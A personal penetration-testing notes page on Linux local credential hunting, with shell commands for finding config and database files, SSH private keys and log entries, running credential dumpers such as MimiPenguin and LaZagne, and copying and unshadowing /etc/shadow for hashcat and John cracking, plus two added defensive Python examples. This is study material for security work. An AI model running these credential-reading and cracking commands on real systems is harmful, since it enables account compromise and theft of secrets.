Noirchapeau's Gitbook
Linux Local Password Attacks

Overview of Credential Hunting

Credential hunting is a critical phase in penetration testing and privilege escalation, involving systematic exploration of various system sources to uncover sensitive authentication information.

Key Credential Sources

1. File-based Credential Sources

  • Configuration files

  • Databases

  • Notes and scripts

  • Cronjobs

  • SSH Keys

2. Historical Information Sources

  • Command history

  • Bash-related files

  • Log files

3. Memory and Credential Storage

  • System memory

  • Browser credentials

  • Keyrings

Systematic Credential Extraction Methodology

1. Configuration Files Reconnaissance

  • Command for Scanning Configuration Files:

    # Loop over the extensions directly; quote "*$l" so the shell does not expand it in the current directory
    for l in .conf .config .cnf; do
      echo -e "\nFile extension: $l"
      find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"
    done
  • Key Search Strategies:

    • Look for files with .conf, .config, .cnf extensions

    • Use grep to search for keywords: user, password, pass

    • Exclude unnecessary system directories

2. Database File Discovery

  • Command for Database File Hunting:

    # Quote each pattern: an unquoted .*db or .db* would be globbed against the current directory
    for l in .sql .db ".*db" ".db*"; do
      echo -e "\nDB File extension: $l"
      find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"
    done
  • Focus Areas:

    • SQL databases

    • .db files

    • Hidden database files

3. SSH Key Exploration

  • Private Key Search:

    # grep -rn prints file:line:content; ":1:" keeps only hits on line 1 (the key header), not lines 10-19 or 100+
    grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1:"
  • Public Key Search:

    grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1:"

4. Comprehensive Log Analysis

  • Log File Scanning Command:

    # Define the pattern once and iterate the glob directly instead of parsing ls output
    PATTERN="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND=\|logs"
    for i in /var/log/*; do
      [ -f "$i" ] || continue            # skip subdirectories such as /var/log/apt
      if grep -q "$PATTERN" "$i" 2>/dev/null; then
        echo -e "\n#### Log file: $i"
        grep "$PATTERN" "$i" 2>/dev/null
      fi
    done
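The grep above only shows matching lines; the events it hunts for (accepted and failed SSH logins, sudo commands, password changes, new accounts) are the same ones a defender wants structured and counted. The following parser is an added example written for these notes, not code from the original page or from any tool it links; it assumes Debian-style /var/log/auth.log syslog lines, and the sample lines it runs on are constructed.

```python
import re
from collections import Counter

# Constructed sample of /var/log/auth.log lines (syslog format) for this example.
SAMPLE_AUTH_LOG = """\
Mar  3 10:14:02 host sshd[1201]: Accepted publickey for alice from 10.0.0.5 port 51000 ssh2: RSA SHA256:abcd
Mar  3 10:15:10 host sshd[1210]: Failed password for bob from 10.0.0.9 port 51234 ssh2
Mar  3 10:15:12 host sshd[1210]: Failed password for bob from 10.0.0.9 port 51234 ssh2
Mar  3 10:15:15 host sshd[1210]: Failed password for invalid user admin from 10.0.0.9 port 51240 ssh2
Mar  3 10:16:00 host sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
Mar  3 10:16:01 host sudo: pam_unix(sudo:session): session opened for user root by alice(uid=1000)
Mar  3 10:17:30 host passwd[1300]: pam_unix(passwd:chauthtok): password changed for carol
Mar  3 10:18:00 host useradd[1310]: new user: name=svc_backup, UID=1002, GID=1002, home=/home/svc_backup, shell=/bin/bash
"""

ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted (\w+) for (\S+) from (\S+)")
FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
SUDO_CMD = re.compile(r"sudo:\s+(\S+) : .*?COMMAND=(.*)$")
PW_CHANGED = re.compile(r"password changed for (\S+)")
NEW_USER = re.compile(r"new user: name=([^,]+)")

def parse_auth_line(line):
    """Classify one auth.log line; returns (event, details) or None if uninteresting."""
    if m := ACCEPTED.search(line):
        return ("accepted", {"method": m.group(1), "user": m.group(2), "src": m.group(3)})
    if m := FAILED.search(line):
        return ("failed", {"user": m.group(1), "src": m.group(2)})
    if m := SUDO_CMD.search(line):
        return ("sudo", {"user": m.group(1), "command": m.group(2).strip()})
    if m := PW_CHANGED.search(line):
        return ("password_changed", {"user": m.group(1)})
    if m := NEW_USER.search(line):
        return ("new_user", {"user": m.group(1)})
    return None

def scan_auth_log(text, fail_threshold=3):
    """Summarise auth events and flag source IPs with fail_threshold or more failed logins."""
    events = [e for e in map(parse_auth_line, text.splitlines()) if e]
    failed_by_src = Counter(d["src"] for ev, d in events if ev == "failed")
    return {
        "events": events,
        "accepted": [d for ev, d in events if ev == "accepted"],
        "sudo_commands": [d for ev, d in events if ev == "sudo"],
        "brute_force_sources": [s for s, n in failed_by_src.items() if n >= fail_threshold],
        "account_changes": [(ev, d["user"]) for ev, d in events if ev in ("password_changed", "new_user")],
    }
```

Run `scan_auth_log(open("/var/log/auth.log").read())` on a real host to get the same summary; on the sample it reports one accepted key login, a sudo read of /etc/shadow, a source with three failures and two account changes.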

Credential Extraction Tools

1. MimiPenguin

  • Purpose: Memory credential extraction

  • Usage:

    sudo python3 mimipenguin.py
    sudo bash mimipenguin.sh

2. LaZagne

  • Comprehensive Credential Extraction

  • Command:

    sudo python2.7 laZagne.py all
  • Supports Extraction From:

    • WiFi

    • Browsers

    • SSH

    • Keyrings

    • Multiple other sources

3. Firefox Decrypt

  • Usage:

    python3.9 firefox_decrypt.py

Password Cracking Workflow

1. Hash Extraction

  • Use unshadow to combine /etc/passwd and /etc/shadow files

    sudo cp /etc/passwd /tmp/passwd.bak
    sudo cp /etc/shadow /tmp/shadow.bak
    unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashes

2. Hashcat Cracking Techniques

  • SHA-512 Hash Cracking:

    hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked
  • MD5 Hash Cracking:

    hashcat -m 500 -a 0 md5-hashes.list rockyou.txt

3. John Cracking Techniques

  • SHA-512 Hash Cracking:

    john --wordlist=rockyou.txt --format=sha512crypt /tmp/unshadowed.hashes
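Hashcat mode 500 versus 1800 is decided by the crypt(3) prefix of each unshadowed entry ($1$ is md5crypt, $6$ is sha512crypt), and the same prefix tells an administrator which accounts still carry weak hashes or no password at all. The audit below is an added example for these notes, not code from the original page or from hashcat or John; it assumes unshadow output in the standard passwd layout, the mode numbers are the ones hashcat documents for these formats, and the sample entries and hash strings are constructed placeholders.

```python
import re

# Constructed sample of unshadow output (passwd joined with shadow); hash bodies are placeholders.
SAMPLE_UNSHADOWED = """\
root:$6$Wf2g1cQx$PLACEHOLDERSHA512HASH:0:0:root:/root:/bin/bash
legacy:$1$ab12cd34$PLACEHOLDERMD5HASH:1001:1001::/home/legacy:/bin/bash
svc:$y$j9T$PLACEHOLDERYESCRYPTHASH:1002:1002::/home/svc:/bin/sh
guest::1003:1003::/home/guest:/bin/bash
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
daemon:!:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""

# crypt(3) id prefix -> (algorithm, hashcat -m mode or None if hashcat has no native mode, weak?)
HASH_TYPES = {
    "1": ("md5crypt", 500, True),
    "5": ("sha256crypt", 7400, False),
    "6": ("sha512crypt", 1800, False),
    "y": ("yescrypt", None, False),
}

def classify_hash(field):
    """Return (algorithm, hashcat_mode, severity) for one shadow password field."""
    if field == "":
        return ("none", None, "critical")       # empty field: the account logs in with no password
    if field[0] in ("!", "*"):
        return ("locked", None, "ok")           # locked or password-less system account
    m = re.match(r"^\$([^$]+)\$", field)
    if not m or m.group(1) not in HASH_TYPES:
        return ("unknown", None, "review")      # DES crypt or a format not in the table
    algo, mode, weak = HASH_TYPES[m.group(1)]
    return (algo, mode, "weak" if weak else "ok")

def audit_unshadowed(text):
    """Audit each account; returns a list of (user, algorithm, hashcat_mode, severity)."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue                            # not a passwd-format line
        user, pw = fields[0], fields[1]
        algo, mode, sev = classify_hash(pw)
        findings.append((user, algo, mode, sev))
    return findings

def needs_attention(text):
    """Users whose entries are not 'ok': empty passwords, weak hashes, unknown formats."""
    return [u for u, _, _, sev in audit_unshadowed(text) if sev != "ok"]
```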

Critical Recommendations

  • Always adapt your approach to the specific system environment

  • Understand the system's purpose and network role

  • Be systematic and thorough in your search

  • Respect legal and ethical boundaries during penetration testing

Useful Log Locations

  • /var/log/messages

  • /var/log/syslog

  • /var/log/auth.log

  • /var/log/secure

  • /var/log/faillog

Tool Links

  • MimiPenguin: https://github.com/huntergregal/mimipenguin

  • LaZagne: https://github.com/AlessandroZ/LaZagne

  • Firefox Decrypt: https://github.com/unode/firefox_decrypt
